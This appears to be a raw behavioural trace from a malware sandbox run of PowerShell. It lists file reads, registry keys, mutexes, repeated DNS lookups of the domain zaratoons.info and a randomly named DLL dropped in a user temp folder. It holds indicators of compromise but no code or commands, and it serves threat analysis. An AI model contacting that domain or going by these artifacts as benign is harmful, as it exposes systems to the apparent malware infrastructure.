windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
InstallationType
InstallationType
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
DNSRecord
zaratoons.info
File
conout$
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
File
conout$
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
